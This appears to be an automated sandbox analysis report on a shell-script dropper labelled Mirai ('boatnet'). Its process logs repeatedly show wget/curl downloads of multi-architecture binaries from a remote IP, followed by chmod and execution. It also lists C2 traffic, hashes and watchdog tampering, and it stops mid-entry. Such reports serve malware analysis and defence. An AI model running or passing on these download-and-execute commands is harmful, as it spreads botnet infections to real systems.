/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-timedated.service-DsKJWD WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-qFPeaa netplan_tp4c7aih ohshit.sh snap-private-tmp ssh-L7Ck4WeeJZaz systemd-private-151007155936412ba5cb80e5bfa5ecbd-bolt.service-nEA2jS systemd-private-151007155936412ba5cb80e5bfa5ecbd-colord.service-jOXWU1 systemd-private-151007155936412ba5cb80e5bfa5ecbd-ModemManager.service-78CYR9 systemd-private-151007155936412ba5cb80e5bfa5ecbd-systemd-resolved.service-lPstul WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 94.156.71.225:80 94.156.71.225 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
US 151.101.1.91:443 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
GB 195.181.164.14:443 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

memory/1525-1-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1534-2-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1543-3-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1552-4-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1561-5-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1603-6-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1613-7-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1629-8-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1646-9-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1671-10-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1682-11-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1692-12-0x0000000008048000-0x000000000805ce08-memory.dmp

memory/1703-13-0x0000000008048000-0x000000000805ce08-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

ubuntu2004-amd64-20240729-en

Max time kernel

59s

Max time network

65s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/78/status /tmp/WTF N/A
File opened for reading /proc/443/status /tmp/WTF N/A
File opened for reading /proc/1548/status /tmp/WTF N/A
File opened for reading /proc/1493/status /tmp/WTF N/A
File opened for reading /proc/1319/status /tmp/WTF N/A
File opened for reading /proc/536/status /tmp/WTF N/A
File opened for reading /proc/995/status /tmp/WTF N/A
File opened for reading /proc/1124/status /tmp/WTF N/A
File opened for reading /proc/1570/status /tmp/WTF N/A
File opened for reading /proc/163/status /tmp/WTF N/A
File opened for reading /proc/1086/status /tmp/WTF N/A
File opened for reading /proc/1514/status /tmp/WTF N/A
File opened for reading /proc/1528/status /tmp/WTF N/A
File opened for reading /proc/1605/status /tmp/WTF N/A
File opened for reading /proc/1485/status /tmp/WTF N/A
File opened for reading /proc/301/status /tmp/WTF N/A
File opened for reading /proc/1522/status /tmp/WTF N/A
File opened for reading /proc/22/status /tmp/WTF N/A
File opened for reading /proc/76/status /tmp/WTF N/A
File opened for reading /proc/1503/status /tmp/WTF N/A
File opened for reading /proc/761/status /tmp/WTF N/A
File opened for reading /proc/75/status /tmp/WTF N/A
File opened for reading /proc/1123/status /tmp/WTF N/A
File opened for reading /proc/12/status /tmp/WTF N/A
File opened for reading /proc/1551/status /tmp/WTF N/A
File opened for reading /proc/1074/status /tmp/WTF N/A
File opened for reading /proc/22/status /tmp/WTF N/A
File opened for reading /proc/16/status /tmp/WTF N/A
File opened for reading /proc/1052/status /tmp/WTF N/A
File opened for reading /proc/1454/status /tmp/WTF N/A
File opened for reading /proc/800/status /tmp/WTF N/A
File opened for reading /proc/1487/status /tmp/WTF N/A
File opened for reading /proc/22/status /tmp/WTF N/A
File opened for reading /proc/1074/status /tmp/WTF N/A
File opened for reading /proc/1546/status /tmp/WTF N/A
File opened for reading /proc/497/status /tmp/WTF N/A
File opened for reading /proc/1082/status /tmp/WTF N/A
File opened for reading /proc/71/status /tmp/WTF N/A
File opened for reading /proc/89/status /tmp/WTF N/A
File opened for reading /proc/1122/status /tmp/WTF N/A
File opened for reading /proc/1454/status /tmp/WTF N/A
File opened for reading /proc/1461/status /tmp/WTF N/A
File opened for reading /proc/808/status /tmp/WTF N/A
File opened for reading /proc/1570/status /tmp/WTF N/A
File opened for reading /proc/2/status /tmp/WTF N/A
File opened for reading /proc/1574/status /tmp/WTF N/A
File opened for reading /proc/616/status /tmp/WTF N/A
File opened for reading /proc/505/status /tmp/WTF N/A
File opened for reading /proc/1548/status /tmp/WTF N/A
File opened for reading /proc/636/status /tmp/WTF N/A
File opened for reading /proc/761/status /tmp/WTF N/A
File opened for reading /proc/827/status /tmp/WTF N/A
File opened for reading /proc/1481/status /tmp/WTF N/A
File opened for reading /proc/1088/status /tmp/WTF N/A
File opened for reading /proc/175/status /tmp/WTF N/A
File opened for reading /proc/176/status /tmp/WTF N/A
File opened for reading /proc/1494/status /tmp/WTF N/A
File opened for reading /proc/70/status /tmp/WTF N/A
File opened for reading /proc/1435/status /tmp/WTF N/A
File opened for reading /proc/480/status /tmp/WTF N/A
File opened for reading /proc/1597/status /tmp/WTF N/A
File opened for reading /proc/952/status /tmp/WTF N/A
File opened for reading /proc/538/status /tmp/WTF N/A
File opened for reading /proc/1508/status /tmp/WTF N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/cat

[cat boatnet.x86]

/usr/bin/chmod

[chmod +x boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/chmod

[chmod +x boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-timedated.service-215yfi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]

/usr/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-tiuj6z ohshit.sh snap-private-tmp ssh-F7kqY8sb5xsr systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-colord.service-4FLGsh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-ModemManager.service-U9sixi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-switcheroo-control.service-gQl4Qg systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-logind.service-dvA6Pi systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-systemd-resolved.service-YLazMh systemd-private-1d679f55e0eb4cf6ba94fceb1f25bfc9-upower.service-m1NbUh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]

/usr/bin/chmod

